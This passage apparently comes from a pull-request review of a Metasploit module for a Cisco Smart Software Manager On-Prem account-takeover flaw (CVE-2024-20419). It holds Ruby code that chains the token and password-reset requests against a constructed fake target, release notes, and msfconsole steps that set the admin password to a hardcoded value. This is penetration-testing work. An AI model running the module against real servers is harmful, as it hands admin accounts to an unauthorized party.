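class ResetPasswordError < StandardError; attr_accessor :server_error; end

FakeResponse = Struct.new(:code, :headers, :body) do
  def get_json_document; JSON.parse(body); end
end

# Constructed target: patched: true answers like the SSM 9 output above (200 + "Invalid Access"); broken: true makes generate_code return 500.
class FakeTarget
  attr_reader :calls
  def initialize(patched: false, broken: false)
    @patched, @broken, @calls = patched, broken, Hash.new(0)
  end
  def call(path)
    @calls[path] += 1
    case path
    when '/backend/settings/oauth_adfs'
      FakeResponse.new(200, { 'Set-Cookie' => 'XSRF-TOKEN=constructed%2Btoken%3D%3D; path=/' }, '{}')
    when '/backend/reset_password/generate_code'
      FakeResponse.new(@broken ? 500 : 200, {}, '{"uid":"admin","auth_token":"constructed-auth-token"}')
    when '/backend/reset_password'
      FakeResponse.new(200, {}, @patched ? '{"error":"Invalid Access","error_message":"Invalid Access"}' : '{"status":"OK"}')
    else
      FakeResponse.new(404, {}, '{}')
    end
  end
end

class SsmAccountModule
  def initialize(target, auto_check: true)
    @target, @auto_check = target, auto_check
  end
  # Shared helpers: each raises a custom error and never calls fail_with.
  def get_xsrf_token_value
    res = @target.call('/backend/settings/oauth_adfs')
    raise XsrfTokenError, 'Failed to get a 200 response from the server' unless res.code == 200
    m = res.headers['Set-Cookie'].to_s.match(/XSRF-TOKEN=([^;]+)/)
    raise XsrfTokenError, 'XSRF Token not found' unless m
    CGI.unescape(m[1])
  end
  def get_auth_token
    res = @target.call('/backend/reset_password/generate_code')
    raise AuthTokenError, 'generate_code did not return a 200 response' unless res.code == 200
    res.get_json_document['auth_token'] || raise(AuthTokenError, 'auth_token not found')
  end
  def reset_password
    res = @target.call('/backend/reset_password')
    raise ResetPasswordError, 'Did not receive a 200 response from backend/reset_password' unless res.code == 200
    json = res.get_json_document
    return json unless json['error_message']  # application errors still arrive as HTTP 200
    err = ResetPasswordError.new("There was an error resetting the password: #{json['error_message']}")
    err.server_error = json['error_message']
    raise err
  end
  # check always returns a CheckCode, whatever the helpers raise.
  def check
    @xsrf_token_value = get_xsrf_token_value
    @auth_token = get_auth_token
    reset_password['status'] == 'OK' ? CheckCode::Vulnerable : CheckCode::Unknown
  rescue ResetPasswordError => e
    return CheckCode::Safe if e.server_error == 'Invalid Access'  # assumed patched signature
    @check_error = "#{e.class}, #{e.message}"
    CheckCode::Unknown
  rescue XsrfTokenError, AuthTokenError => e
    @check_error = "#{e.class}, #{e.message}"
    CheckCode::Unknown
  end
  def run
    if @auto_check
      code = check
      fail_with("Cannot reliably check exploitability. Check method failed: #{@check_error}") if code == CheckCode::Unknown
      fail_with('The target is not exploitable') if code == CheckCode::Safe
    end
    @xsrf_token_value ||= get_xsrf_token_value  # reuse whatever check already fetched
    @auth_token ||= get_auth_token
    reset_password
    true  # password for the admin user was updated
  rescue XsrfTokenError, AuthTokenError, ResetPasswordError => e
    fail_with("Exploit pre-conditions were not met #{e.class}, #{e.message}")
  end
  def fail_with(msg)  # stand-in for the framework's fail_with
    raise ExploitAborted, msg
  end
end
```

With the constructed target, a run with AutoCheck on sends the oauth_adfs and generate_code requests once each and reset_password twice (once from check, once from run), which is the duplication the `||=` pattern removes for the token requests.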
@jheysel-r7 Thank you for all the reliability improvements and explanations.
Release Notes
This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206, by changing the password of the admin user to one that is attacker-controlled.
This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the admin user to an attacker-controlled one.
Verification Steps
msfconsole
use auxiliary/admin/http/cisco_ssm_onprem_account
set RHOSTS <IP>
set SSL true
run
A new password (currently hardcoded to Testbaaasab@123456780) should have been set for the admin account.
Successfully tested on